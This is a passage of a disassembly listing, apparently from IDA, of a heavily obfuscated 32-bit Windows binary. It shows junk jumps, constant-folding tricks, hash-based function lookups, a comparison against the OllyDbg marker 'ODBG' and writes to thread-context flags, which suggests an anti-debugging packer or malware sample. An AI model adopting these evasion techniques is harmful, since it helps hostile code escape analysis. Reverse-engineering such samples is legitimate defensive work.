mov dword ptr [ecx], 10001h
lea eax, loc_42743A
mov [ecx+0B8h], eax
pop ecx
xor eax, eax
jmp nullsub_131
; END OF FUNCTION CHUNK FOR sub_42D15D
; =============== S U B R O U T I N E =======================================
sub_428A39 proc near ; CODE XREF: _0182ofla:0042479C�j
; sub_427906+6256�p
; FUNCTION CHUNK AT 0042376B SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00423896 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00423921 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00423CC4 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00423D59 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00424612 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00425269 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00426D82 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427D55 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00428510 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042950D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042A699 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042B6A7 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042C2A4 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042CD9A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042DEB5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E11B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042ECD1 SIZE 00000010 BYTES
xchg ecx, [esp+0]
pop ecx
add eax, esi
call sub_42D19B
loc_428A44: ; CODE XREF: sub_429957:loc_42C48E�j
jmp loc_423CC4
sub_428A39 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424289
loc_428A49: ; CODE XREF: sub_424289+1FDC�j
jmp loc_4289D1
; END OF FUNCTION CHUNK FOR sub_424289
; ---------------------------------------------------------------------------
loc_428A4E: ; CODE XREF: _0182ofla:loc_429AF4�j
push ecx
jmp loc_426817
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_241. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42380D
loc_428A55: ; CODE XREF: sub_42380D+981B�j
jmp loc_428CA7
; END OF FUNCTION CHUNK FOR sub_42380D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B00
loc_428A5A: ; CODE XREF: sub_425B00+6C4�j
jmp loc_42AFA1
; END OF FUNCTION CHUNK FOR sub_425B00
; =============== S U B R O U T I N E =======================================
sub_428A5F proc near ; CODE XREF: _0182ofla:00424279�j
; sub_42310C+B958�p
; FUNCTION CHUNK AT 0042827B SIZE 0000000A BYTES
xchg ebx, [esp+0]
pop ebx
pop ebp
mov eax, ds:dword_42D128
or eax, eax
jnz loc_42827B
call sub_428D09
push offset loc_4248CA
jmp nullsub_45
sub_428A5F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_428A81: ; CODE XREF: sub_42798F+7FA�j
shl eax, 11h
rol ebp, 4
loc_428A87: ; CODE XREF: sub_42798F:loc_426DD0�j
call sub_4247FE
mov edx, 3BD2EC5Ch
call sub_42D71D
jmp loc_42721A
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427259
loc_428A9B: ; CODE XREF: sub_427259-9E1�j
jge loc_426C49
push 90ECD5EFh
rol esi, 1Fh
mov edx, [ecx]
loc_428AAB: ; CODE XREF: sub_427259:loc_423FBC�j
push offset loc_42984F
jmp loc_428662
; END OF FUNCTION CHUNK FOR sub_427259
; =============== S U B R O U T I N E =======================================
sub_428AB5 proc near ; CODE XREF: sub_428AC9-1598�p
call sub_42E7E3
sub_428AB5 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_425B6E
loc_428ABA: ; CODE XREF: sub_425B6E+8E59�j
jmp loc_42CC0B
; END OF FUNCTION CHUNK FOR sub_425B6E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B00
loc_428ABF: ; CODE XREF: sub_425B00+1D�j
jmp loc_426821
; END OF FUNCTION CHUNK FOR sub_425B00
; ---------------------------------------------------------------------------
loc_428AC4: ; CODE XREF: _0182ofla:00424A49�j
jmp loc_424640
; =============== S U B R O U T I N E =======================================
sub_428AC9 proc near ; DATA XREF: _0182ofla:00424E9E�o
var_8 = dword ptr -8
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004264B3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427528 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00429CF6 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042A45B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CF1F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042E153 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0042E563 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EB23 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042ED39 SIZE 00000010 BYTES
push ebx
push 0B148FB01h
pop ebx
sub ebx, 0F1F4FA6Bh
xor ebx, 0AC2674FDh
jmp loc_42E563
sub_428AC9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_428AE1 proc near ; DATA XREF: sub_4270B3+4�o
call sub_42A3E4
mov ecx, offset loc_428AFE
xchg ecx, [esp+0]
retn
sub_428AE1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EA15
loc_428AEF: ; CODE XREF: sub_42EA15+E�j
jmp loc_428C68
; END OF FUNCTION CHUNK FOR sub_42EA15
; ---------------------------------------------------------------------------
loc_428AF4: ; CODE XREF: _0182ofla:0042CBBE�j
jmp loc_429BBE
; ---------------------------------------------------------------------------
loc_428AF9: ; CODE XREF: _0182ofla:00425688�j
jmp loc_42D799
; ---------------------------------------------------------------------------
loc_428AFE: ; DATA XREF: sub_428AE1+5�o
mov eax, [ebp-4]
push 0AA9FDEF0h
pop edx
jmp loc_425E70
; =============== S U B R O U T I N E =======================================
sub_428B0C proc near ; CODE XREF: sub_426B60+A�p
; FUNCTION CHUNK AT 00428DA3 SIZE 00000005 BYTES
xchg eax, [esp+0]
mov eax, [esp+0]
push 0E81364E4h
pop eax
add eax, 182F760Bh
xchg eax, [esp+0]
jmp loc_428DA3
sub_428B0C endp
; =============== S U B R O U T I N E =======================================
sub_428B26 proc near ; CODE XREF: _0182ofla:00424032�j
; sub_42798F+1AE5�p
xchg eax, [esp+0]
pop eax
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F6h
push offset loc_42CFFC
jmp nullsub_46
sub_428B26 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_48. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C553
loc_428B3F: ; CODE XREF: sub_42C553-7CD2�j
jmp loc_424F46
; ---------------------------------------------------------------------------
loc_428B44: ; CODE XREF: sub_42C553:loc_42944A�j
; sub_42C553-30FD�j
add eax, 8125711Ch
loc_428B4A: ; CODE XREF: sub_4282B8-3800�j
add eax, ebp
add eax, 72D68B98h
cmp dword ptr [eax], 4742444Fh
jz loc_42595F
; END OF FUNCTION CHUNK FOR sub_42C553
; START OF FUNCTION CHUNK FOR sub_428D63
loc_428B5E: ; CODE XREF: sub_428D63-4B50�j
; sub_42C553-8337�j ...
jnb loc_42B359
cmp dword ptr [ebp-4], 1
jnz loc_42A0CF
loc_428B6E: ; CODE XREF: _0182ofla:004292DB�j
jmp loc_42B875
; END OF FUNCTION CHUNK FOR sub_428D63
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_181. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427DA9
loc_428B74: ; CODE XREF: sub_427DA9+2594�j
jmp nullsub_209
; END OF FUNCTION CHUNK FOR sub_427DA9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42660C
loc_428B79: ; CODE XREF: sub_42660C:loc_425F33�j
; sub_429FF9+C�j
jmp loc_42436E
; END OF FUNCTION CHUNK FOR sub_42660C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D03E
loc_428B7E: ; CODE XREF: sub_42D03E-444B�j
jmp loc_424D02
; END OF FUNCTION CHUNK FOR sub_42D03E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4235C7
loc_428B83: ; CODE XREF: sub_4235C7:loc_42B39E�j
and esi, ebp
jmp loc_424624
; END OF FUNCTION CHUNK FOR sub_4235C7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B669
loc_428B8A: ; CODE XREF: sub_42B669-39FD�j
shr ebp, 17h
add ecx, eax
not ebx
; END OF FUNCTION CHUNK FOR sub_42B669
; =============== S U B R O U T I N E =======================================
sub_428B91 proc near ; CODE XREF: sub_42B669:loc_4244C2�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042B148 SIZE 00000005 BYTES
push ebx
push 42C38E34h
pop ebx
add ebx, 0BD7EC9F2h
xchg ebx, [esp+4+var_4]
jmp loc_42B148
sub_428B91 endp
; ---------------------------------------------------------------------------
xchg ebx, [edi]
jmp loc_42E01A
; ---------------------------------------------------------------------------
sub ebp, esi
jmp loc_426CC2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_428BB4: ; CODE XREF: sub_428D63:loc_423377�j
jnz loc_42A0CF
jmp loc_429A44
; END OF FUNCTION CHUNK FOR sub_428D63
; =============== S U B R O U T I N E =======================================
sub_428BBF proc near ; CODE XREF: sub_4295D6+6�p
; FUNCTION CHUNK AT 0042415F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042849F SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042B824 SIZE 00000012 BYTES
call sub_4251FB
loc_428BC4: ; CODE XREF: sub_425B6E-1202�j
jmp loc_42B824
sub_428BBF endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_428BC9: ; CODE XREF: sub_4253F4+108F�j
; sub_4253F4:loc_42CF2F�j
cmp ebx, 68747541h
jz loc_42E126
jmp loc_425886
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B15E
loc_428BDA: ; CODE XREF: sub_42B15E:loc_4290D4�j
; sub_428C7D:loc_42E103�j
xor edx, 0F69189F9h
cmp edx, 0B14E7B57h
jmp loc_42437E
; END OF FUNCTION CHUNK FOR sub_42B15E
; =============== S U B R O U T I N E =======================================
sub_428BEB proc near ; DATA XREF: sub_42D33D+92A�o
push eax
retn
sub_428BEB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D03E
loc_428BED: ; CODE XREF: sub_42D03E:loc_423C99�j
push edx
mov [esp+4+var_4], ebp
mov ebp, esp
jmp loc_428B7E
; END OF FUNCTION CHUNK FOR sub_42D03E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A760
loc_428BF8: ; CODE XREF: sub_42A760:loc_42CB87�j
jnz loc_42A8C5
jmp loc_429792
; END OF FUNCTION CHUNK FOR sub_42A760
; ---------------------------------------------------------------------------
mov edx, 9E849D81h
push ecx
push 0D029AED5h
mov ecx, offset sub_427593
xchg ecx, [esp]
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E218
loc_428C17: ; CODE XREF: sub_42E218-85E5�j
jmp loc_42CC9F
; END OF FUNCTION CHUNK FOR sub_42E218
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_428C1C: ; CODE XREF: sub_428F20-5398�j
jno loc_427861
mov edx, 0BE327463h
cdq
loc_428C28: ; CODE XREF: sub_428F20:loc_423B33�j
lea edx, [ebp-14h]
push 0D297E0A1h
jmp loc_425E80
; END OF FUNCTION CHUNK FOR sub_428F20
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CEA4
loc_428C35: ; CODE XREF: sub_42CEA4:loc_42AEF2�j
or eax, edx
mov edx, [ebp+8]
mov [edx-8], eax
; END OF FUNCTION CHUNK FOR sub_42CEA4
; START OF FUNCTION CHUNK FOR sub_424C61
loc_428C3D: ; CODE XREF: sub_424C61+4�j
; _0182ofla:loc_4270F3�j ...
mov eax, [ebp-4]
mov [ebp-8], eax
mov eax, [ebp-8]
mov esp, ebp
pop ebp
jmp loc_4257BF
; END OF FUNCTION CHUNK FOR sub_424C61
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F0F
loc_428C4E: ; CODE XREF: sub_428F0F-40B2�j
sub ebx, edi
mov [eax], ecx
jmp loc_42CE3D
; END OF FUNCTION CHUNK FOR sub_428F0F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_113. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D09
loc_428C58: ; CODE XREF: sub_428D09+9�j
jmp sub_42660C
; END OF FUNCTION CHUNK FOR sub_428D09
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423127
loc_428C5D: ; CODE XREF: sub_423127+5�j
jmp loc_425215
; END OF FUNCTION CHUNK FOR sub_423127
; ---------------------------------------------------------------------------
locret_428C62: ; CODE XREF: _0182ofla:004235C2�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FE2
loc_428C63: ; CODE XREF: sub_423FE2+5581�j
jmp loc_4298C6
; END OF FUNCTION CHUNK FOR sub_423FE2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EA15
loc_428C68: ; CODE XREF: sub_42EA15:loc_428AEF�j
push dword ptr [ebp-4]
push eax
push 33E29C47h
pop eax
jmp loc_427148
; END OF FUNCTION CHUNK FOR sub_42EA15
; ---------------------------------------------------------------------------
loc_428C77: ; CODE XREF: _0182ofla:00429C63�j
or ebp, 5B1324B3h
; =============== S U B R O U T I N E =======================================
sub_428C7D proc near ; CODE XREF: _0182ofla:loc_42B1D8�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042465A SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004257AD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427866 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042851A SIZE 00000028 BYTES
; FUNCTION CHUNK AT 0042C54E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E103 SIZE 00000005 BYTES
xchg eax, [esp-4+arg_0]
pop eax
cmp ebx, eax
add edx, eax
sbb ebx, 0CB8369A6h
jmp loc_4257AD
sub_428C7D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jo loc_42DC76
mov eax, [esi]
jmp sub_423395
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EAB7
loc_428C9D: ; CODE XREF: sub_42EAB7-AEB8�j
; _0182ofla:loc_42A5C7�j
call sub_42D02D
jmp loc_42AA1F
; END OF FUNCTION CHUNK FOR sub_42EAB7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42380D
loc_428CA7: ; CODE XREF: sub_42380D:loc_428A55�j
jmp loc_425E21
; ---------------------------------------------------------------------------
loc_428CAC: ; CODE XREF: sub_42380D+B�j
; sub_425B6E:loc_42B855�j ...
jnb loc_4239A1
push edx
call sub_4299B8
loc_428CB8: ; CODE XREF: sub_428F46:loc_42EB13�j
mov ecx, esp
add ecx, 10h
mov ecx, [ecx]
mov dword ptr [ecx], 10013h
xor eax, eax
add ecx, 4
jmp loc_42D204
; END OF FUNCTION CHUNK FOR sub_42380D
; ---------------------------------------------------------------------------
loc_428CD5: ; CODE XREF: _0182ofla:0042E656�j
test ecx, 0D2E6818Dh
loc_428CDB: ; CODE XREF: _0182ofla:004239B2�j
jmp loc_428059
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_428CE0: ; CODE XREF: sub_428F20-1E72�j
jnb loc_42E304
; END OF FUNCTION CHUNK FOR sub_428F20
; =============== S U B R O U T I N E =======================================
sub_428CE6 proc near ; CODE XREF: sub_42537E:loc_42EC4E�p
mov [esp+0], esi
pop esi
jmp loc_42AAF1
sub_428CE6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42537E
loc_428CEF: ; CODE XREF: sub_42537E+7289�j
jz loc_42C4E5
push offset loc_42C172
jmp loc_42AE55
; END OF FUNCTION CHUNK FOR sub_42537E
; =============== S U B R O U T I N E =======================================
sub_428CFF proc near ; CODE XREF: sub_4294A4�j
; DATA XREF: sub_4253DC+40BE�o
ror eax, 6
mov ds:dword_425794, eax
retn
sub_428CFF endp
; =============== S U B R O U T I N E =======================================
sub_428D09 proc near ; CODE XREF: sub_4295D6:loc_423F83�p
; sub_42E218:loc_424B9C�j ...
; FUNCTION CHUNK AT 00428C58 SIZE 00000005 BYTES
jb sub_428F20
push ebp
mov ebp, esp
jmp loc_428C58
sub_428D09 endp
; =============== S U B R O U T I N E =======================================
sub_428D17 proc near ; CODE XREF: _0182ofla:00423595�j
; sub_42364C+7�j ...
js sub_42306F
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
mov eax, offset dword_42A3A8
loc_428D28: ; CODE XREF: sub_42E2EE:loc_429F66�j
jmp loc_427A48
sub_428D17 endp
; =============== S U B R O U T I N E =======================================
sub_428D2D proc near ; DATA XREF: _0182ofla:004264D3�o
; FUNCTION CHUNK AT 00425F50 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427D26 SIZE 00000005 BYTES
mov eax, ds:dword_42D230
or eax, eax
jnz loc_427D26
call sub_429BB9
mov edx, 65DE9EC5h
call sub_42D71D
push eax
push offset sub_427D17
jmp loc_425F50
sub_428D2D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
ja locret_42B383
mov [edi], ebp
jmp sub_42C553
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_12. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_428D63 proc near ; CODE XREF: sub_426649+399B�p
; _0182ofla:0042DBAC�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423377 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423B1E SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042420D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424FF5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042525F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004257DA SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00425D30 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00425E9E SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00425F55 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042620C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00426311 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00426342 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004263C4 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00426529 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00426551 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042673D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042726A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427479 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427568 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004281C8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004283AF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042841D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042862F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042888E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428B5E SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00428BB4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429A44 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00429EC1 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042A0CF SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042A17C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A53E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A633 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042AF29 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042B115 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042B34B SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042B760 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042B875 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042C50A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042C75E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CC6F SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042D108 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D132 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D31A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042D447 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042DB66 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042DD25 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DD5C SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042DE10 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DE5E SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042DEFA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E184 SIZE 0000000A BYTES
xchg eax, [esp+0]
pop eax
cmp dword ptr [eax], 4742444Fh
jz loc_42595F
jmp loc_42888E
sub_428D63 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_428D78: ; CODE XREF: sub_42798F:loc_4244E9�j
cmp dword ptr [ebp-4], 4
jnz loc_425520
lea eax, [ebp-2BBh]
call sub_42B669
loc_428D8D: ; CODE XREF: sub_42CA29-196E�j
jmp loc_425ECF
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_428D92: ; CODE XREF: sub_42D056-6267�j
jmp loc_429991
; END OF FUNCTION CHUNK FOR sub_42D056
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_217. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_428D98: ; CODE XREF: _0182ofla:0042E800�j
jmp loc_424D29
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DBF0
loc_428D9D: ; CODE XREF: sub_42DBF0-5D24�j
jmp loc_42CA5C
; END OF FUNCTION CHUNK FOR sub_42DBF0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_115. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428B0C
loc_428DA3: ; CODE XREF: sub_428B0C+15�j
jmp sub_428D17
; END OF FUNCTION CHUNK FOR sub_428B0C
; ---------------------------------------------------------------------------
jmp loc_42DF97
; ---------------------------------------------------------------------------
call sub_42A343
; START OF FUNCTION CHUNK FOR sub_42E1DA
loc_428DB2: ; CODE XREF: sub_42E1DA-2BC�j
jmp loc_42C2DB
; END OF FUNCTION CHUNK FOR sub_42E1DA
; ---------------------------------------------------------------------------
loc_428DB7: ; CODE XREF: _0182ofla:loc_42ECC0�j
push 0
push 10h
call sub_42935B
push esi
push 224C8423h
pop esi
and esi, 16E91375h
jmp loc_429512
; ---------------------------------------------------------------------------
push 0A3DA77BBh
ror edx, 13h
jmp sub_4243F2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B00
loc_428DDF: ; CODE XREF: sub_425B00+D31�j
push offset sub_42D2A9
jmp loc_427016
; END OF FUNCTION CHUNK FOR sub_425B00
; ---------------------------------------------------------------------------
loc_428DE9: ; CODE XREF: _0182ofla:004292B3�j
rol edx, 8
jmp loc_42B1E2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42968B
loc_428DF1: ; CODE XREF: sub_42968B:loc_424379�j
call sub_428D17
mov edx, 7DA6ACC0h
call sub_42D71D
xchg eax, ebp
push ebp
jmp loc_4249EA
; END OF FUNCTION CHUNK FOR sub_42968B
; =============== S U B R O U T I N E =======================================
sub_428E08 proc near ; DATA XREF: sub_42A592+12�o
add ebx, 0B787FE2Bh
sub_428E08 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42448C
loc_428E0E: ; CODE XREF: sub_42448C:loc_4299C6�j
mov [ebx], eax
call sub_428F0F
loc_428E15: ; CODE XREF: sub_426571+8CE�j
jmp loc_4297B2
; END OF FUNCTION CHUNK FOR sub_42448C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_428E1A: ; CODE XREF: sub_423FCD:loc_42A3D5�j
mov esi, ecx
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DE3A
loc_428E1E: ; CODE XREF: sub_42DE3A-91F3�j
jmp loc_42E0D6
; END OF FUNCTION CHUNK FOR sub_42DE3A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424289
loc_428E23: ; CODE XREF: sub_424289+11�j
jmp loc_42A716
; END OF FUNCTION CHUNK FOR sub_424289
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428176
loc_428E28: ; CODE XREF: sub_428176+3EF�j
rol eax, 9
pushf
mov [esp+0], eax
call sub_424CD8
retn
; END OF FUNCTION CHUNK FOR sub_428176
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42583B
loc_428E35: ; CODE XREF: sub_42583B:loc_425CFA�j
jmp loc_424AF3
; END OF FUNCTION CHUNK FOR sub_42583B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FE2
loc_428E3A: ; CODE XREF: sub_423FE2+E�j
; _0182ofla:loc_424785�j ...
push esi
push 1FC0F74h
xor esi, 0A6035665h
loc_428E46: ; CODE XREF: sub_4253F4+463F�j
jmp loc_429556
; END OF FUNCTION CHUNK FOR sub_423FE2
; =============== S U B R O U T I N E =======================================
sub_428E4B proc near ; DATA XREF: sub_429D83:loc_426A33�o
inc ds:dword_42577C
lea eax, nullsub_28
push offset loc_423A09
jmp nullsub_49
sub_428E4B endp
; ---------------------------------------------------------------------------
xor edi, ebp
cmp edx, 3407BD6Dh
jmp loc_423937
; ---------------------------------------------------------------------------
push eax
ror eax, 0Ah
call sub_4242FD
; START OF FUNCTION CHUNK FOR sub_42798F
loc_428E77: ; CODE XREF: sub_42798F+1F69�j
jmp loc_42994B
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_428E7C: ; CODE XREF: sub_423A2A-9D8�j
jnz loc_424C84
jmp loc_42E2E9
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
loc_428E87: ; DATA XREF: sub_4296F0:loc_427CB8�o
call sub_428E8D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_56. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_428E8D proc near ; CODE XREF: _0182ofla:loc_428E87�p
push ebx
push ecx
call sub_42C6EB
mov esp, [esp+8]
sub_428E8D endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_423AB1
loc_428E98: ; CODE XREF: sub_423AB1+9�j
; sub_4231F3+8DB�j ...
xor eax, eax
jmp loc_423DDD
; END OF FUNCTION CHUNK FOR sub_423AB1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A3E4
loc_428E9F: ; CODE XREF: sub_42A3E4:loc_42A3EC�j
mov eax, 6
sub eax, [ebp+var_4]
mov [ebp+var_4], eax
jmp loc_42A988
; END OF FUNCTION CHUNK FOR sub_42A3E4
; =============== S U B R O U T I N E =======================================
sub_428EAF proc near ; CODE XREF: sub_426571-321�p
; sub_426571+439A�p
push offset sub_423861
jmp nullsub_50
sub_428EAF endp
; =============== S U B R O U T I N E =======================================
sub_428EB9 proc near ; CODE XREF: sub_425B6E+1F24�p
; _0182ofla:0042CF1A�j
; FUNCTION CHUNK AT 00423211 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 00423E10 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004240D3 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004250BE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426713 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004269CF SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00426F27 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427C17 SIZE 00000036 BYTES
; FUNCTION CHUNK AT 0042917B SIZE 00000026 BYTES
; FUNCTION CHUNK AT 004299E8 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00429AFE SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042AA1D SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0042AC56 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0042BCFD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D919 SIZE 0000001C BYTES
